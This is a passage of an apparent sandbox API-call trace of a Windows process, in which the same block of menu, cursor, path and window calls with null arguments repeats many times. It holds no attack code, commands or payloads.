[0027.378] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.378] GetStockObject (i=6) returned 0x1b00018 [0027.378] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.378] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.378] PathFileExistsW (pszPath=0x0) returned 0 [0027.378] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.378] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.378] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.378] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.378] GetMenu (hWnd=0x0) returned 0x0 [0027.378] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.378] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.378] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.378] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.378] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.378] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.378] GetStockObject (i=6) returned 0x1b00018 [0027.379] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.379] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.379] PathFileExistsW (pszPath=0x0) returned 0 [0027.379] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.379] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.379] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.379] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.379] GetMenu (hWnd=0x0) returned 0x0 [0027.379] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.379] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.379] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.379] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.379] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.379] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.379] GetStockObject (i=6) returned 0x1b00018 [0027.379] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.379] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.379] PathFileExistsW (pszPath=0x0) returned 0 [0027.379] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.379] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.379] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.379] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.379] GetMenu (hWnd=0x0) returned 0x0 [0027.379] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.379] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.379] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.380] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.380] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.380] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.380] GetStockObject (i=6) returned 0x1b00018 [0027.380] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.380] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.380] PathFileExistsW (pszPath=0x0) returned 0 [0027.380] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.380] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.380] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.380] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.380] GetMenu (hWnd=0x0) returned 0x0 [0027.380] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.380] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.380] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.380] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.380] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.380] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.380] GetStockObject (i=6) returned 0x1b00018 [0027.380] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.380] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.380] PathFileExistsW (pszPath=0x0) returned 0 [0027.380] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.380] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.381] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.381] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.381] GetMenu (hWnd=0x0) returned 0x0 [0027.381] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x12e) returned -1 [0027.381] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.381] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.381] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.381] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.381] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.381] GetStockObject (i=6) returned 0x1b00018 [0027.381] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.381] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.381] PathFileExistsW (pszPath=0x0) returned 0 [0027.381] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.381] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.381] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.381] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.381] GetMenu (hWnd=0x0) returned 0x0 [0027.381] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.381] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.381] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.381] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.381] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.381] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.381] GetStockObject (i=6) returned 0x1b00018 [0027.381] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.382] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.382] PathFileExistsW (pszPath=0x0) returned 0 [0027.382] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.382] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.382] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.382] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.382] GetMenu (hWnd=0x0) returned 0x0 [0027.382] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.382] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.382] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.382] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.382] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.382] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.382] GetStockObject (i=6) returned 0x1b00018 [0027.382] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.382] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.382] PathFileExistsW (pszPath=0x0) returned 0 [0027.382] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.382] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.382] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.382] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.382] GetMenu (hWnd=0x0) returned 0x0 [0027.382] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.382] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.382] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.382] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.382] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.382] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.383] GetStockObject (i=6) returned 0x1b00018 [0027.383] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.383] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.383] PathFileExistsW (pszPath=0x0) returned 0 [0027.383] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.383] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.383] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.383] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.383] GetMenu (hWnd=0x0) returned 0x0 [0027.383] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.383] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.383] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.383] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.383] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.383] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.383] GetStockObject (i=6) returned 0x1b00018 [0027.383] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.383] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.383] PathFileExistsW (pszPath=0x0) returned 0 [0027.383] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.383] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.383] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.383] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.383] GetMenu (hWnd=0x0) returned 0x0 [0027.383] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xcf) returned -1 [0027.383] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.384] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.384] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.384] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.384] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.384] GetStockObject (i=6) returned 0x1b00018 [0027.384] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.384] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.384] PathFileExistsW (pszPath=0x0) returned 0 [0027.384] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.384] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.384] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.384] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.384] GetMenu (hWnd=0x0) returned 0x0 [0027.384] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.384] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.384] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.384] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.384] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.384] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.384] GetStockObject (i=6) returned 0x1b00018 [0027.384] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.384] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.384] PathFileExistsW (pszPath=0x0) returned 0 [0027.384] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.384] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.385] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.385] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.385] GetMenu (hWnd=0x0) returned 0x0 [0027.385] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.385] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.385] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.385] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.385] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.385] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.385] GetStockObject (i=6) returned 0x1b00018 [0027.385] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.385] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.385] PathFileExistsW (pszPath=0x0) returned 0 [0027.385] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.385] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.385] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.385] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.385] GetMenu (hWnd=0x0) returned 0x0 [0027.385] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.385] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.385] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.385] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.385] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.385] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.386] GetStockObject (i=6) returned 0x1b00018 [0027.386] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.386] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.386] PathFileExistsW (pszPath=0x0) returned 0 [0027.386] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.386] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.386] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.386] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.386] GetMenu (hWnd=0x0) returned 0x0 [0027.386] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.386] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.386] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.386] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.386] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.386] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.386] GetStockObject (i=6) returned 0x1b00018 [0027.386] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.386] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.386] PathFileExistsW (pszPath=0x0) returned 0 [0027.386] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.386] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.386] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.386] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.386] GetMenu (hWnd=0x0) returned 0x0 [0027.386] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x318) returned -1 [0027.386] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.387] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.387] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.387] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.387] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.387] GetStockObject (i=6) returned 0x1b00018 [0027.387] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.387] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.387] PathFileExistsW (pszPath=0x0) returned 0 [0027.387] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.387] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.387] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.387] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.387] GetMenu (hWnd=0x0) returned 0x0 [0027.387] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.387] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.387] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.387] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.387] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.387] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.387] GetStockObject (i=6) returned 0x1b00018 [0027.387] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.387] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.387] PathFileExistsW (pszPath=0x0) returned 0 [0027.387] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.387] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.388] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.388] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.388] GetMenu (hWnd=0x0) returned 0x0 [0027.388] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.388] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.388] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.388] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.388] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.388] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.388] GetStockObject (i=6) returned 0x1b00018 [0027.388] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.388] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.388] PathFileExistsW (pszPath=0x0) returned 0 [0027.388] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.388] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.388] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.388] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.388] GetMenu (hWnd=0x0) returned 0x0 [0027.388] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.388] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.388] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.388] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.388] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.388] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.388] GetStockObject (i=6) returned 0x1b00018 [0027.388] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.388] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.389] PathFileExistsW (pszPath=0x0) returned 0 [0027.389] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.389] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.389] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.389] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.389] GetMenu (hWnd=0x0) returned 0x0 [0027.389] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.389] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.389] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.389] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.389] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.389] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.389] GetStockObject (i=6) returned 0x1b00018 [0027.389] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.389] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.389] PathFileExistsW (pszPath=0x0) returned 0 [0027.389] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.389] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.389] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.389] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.389] GetMenu (hWnd=0x0) returned 0x0 [0027.389] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x30e) returned -1 [0027.389] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.389] SendMessageW (hWnd=0x0, Msg=0x111, 